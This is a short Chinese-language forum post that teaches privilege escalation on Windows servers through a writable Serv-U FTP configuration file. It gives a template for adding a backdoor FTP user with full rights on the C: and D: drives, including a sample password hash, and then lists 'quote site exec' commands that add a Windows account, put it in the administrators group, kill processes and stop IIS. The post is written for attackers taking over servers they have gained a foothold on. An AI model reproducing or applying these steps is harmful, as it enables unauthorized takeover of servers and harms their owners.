菜鸟亲测能用的SU提权技巧

2015-7-30 23:09| 发布者: admin| 查看: 4603| 评论: 0|来自: 淘客家

摘要: 近段时间提权,发现SU提权时候SU配置文件可写,可是不知道怎么写,正好有个服务器上装的SU就自己配置了一个,然后复制到待提权的机器上,发现很好用。现给大家分享分享。 User数字(第几个用户看服务器上,比方已经 ...
    近段时间提权,发现SU提权时候SU配置文件可写,可是不知道怎么写,正好有个服务器上装的SU就自己配置了一个,然后复制到待提权的机器上,发现很好用。现给大家分享分享。

    User数字(第几个用户看服务器上,比方已经有10个那这写11)=用户名|1|0这个是是否生效用户的属性(这段是在最上面用户排列里面,下面的写到配置文件最底)

    [USER=用户名|1]
    Password=这个是密码=随机的两个字母+密码的32位MD5(我看了几个服务器上面的随机的两个字母基本上都是密码前两位)有的不加密。今天拿个服务器就没加40多个FTP用户密码
    HomeDir=d:\ 这个是登陆时的工作目录
    PasswordLastChange=1234233287这个不清楚,不动他就行
    TimeOut=600 超时时间
    Access1=C:\|RWAMELCDP 我这个是前面是目录后面是目录的属性全部包括读写移动复制执行
    Access2=D:\|RWAMELCDP
    下面是一个样板
    账号密码都为wlke.C,D盘全部属性都有
    User67=wlke|1|0
    [USER=wlke|1]
    Password=wl27f6b939142a0ba469073da622db84f7
    HomeDir=d:\
    PasswordLastChange=1234233287
    TimeOut=600
    Access1=D:\|RWAMELCDP
    Access2=C:\|RWAMELCDP
    这样我们用CMD FTP上去,加用户什么的都行,可以直接执行CMD。
    FTP执行命令也一起发下。
    quote site exec 后面加你要执行的CMD命令
    举例
    quote site exec net user 无忧公子 123456 /add 添加用户无忧公子
    quote site exec net localhost administrators 无忧公子 /add 把用户 无忧公子 添加到管理员组
    quote site exec tskill PID 在 Win 2003 中通过 PID 关闭进程
    quote site exec tskill notepad 在 Win 2003 中通过名称关闭同类的进程
    quote site exec net stop iisadmin 停止 iis 服务
    quote site exec net start iisadmin 启动 iis 服务
    ......

下一篇如何解决网站被挂iframe木马?
上一篇探路者TOREAD转发微博,户外运动耳机、超轻包免费送


支持

超赞

难过

搞笑

扯淡

不解

头晕

欠扁

相关阅读

  • 今天点击最高的新闻

  • 一周点击最多的新闻

返回顶部